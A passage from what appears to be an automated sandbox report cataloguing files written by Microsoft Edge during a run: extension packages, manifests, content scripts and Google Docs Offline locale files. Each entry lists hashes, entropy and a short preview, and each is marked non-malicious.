                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.407657121497128
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0ScKu5BlM016TC:JIVuwEw5MUFZLBQLtgqRM
                                                                                                                                                                                                                                                                                                        MD5:0EBBB7C0400E100A90AC61CDDD08306F
                                                                                                                                                                                                                                                                                                        SHA1:859F1A52BED23F9B9D6CF0D2B4EE47CA0E235803
                                                                                                                                                                                                                                                                                                        SHA-256:20E60EB5579954799D37654DB8C2D444FF7C4D444946E3910BA8BA54B606C0E4
                                                                                                                                                                                                                                                                                                        SHA-512:EA04448FFDC137654094A628A77F57CE601022129C72B5E41A8F3F0156D62FEB1B12CCC67218A9BAB9464E81C53BC2C3AFC2E49FC9C8C748AF62BD51EE3B64BE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\e1c8887f-cab1-47af-b064-9164c87d6b4f.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_259113476\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_259113476\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_259113476\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_259113476\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_259113476\a7201f4f-46ed-4af5-8aad-841cc2129008.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\0b549178-a9e6-4709-bc11-2ae1b28b5fd2.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                        Malicious:false
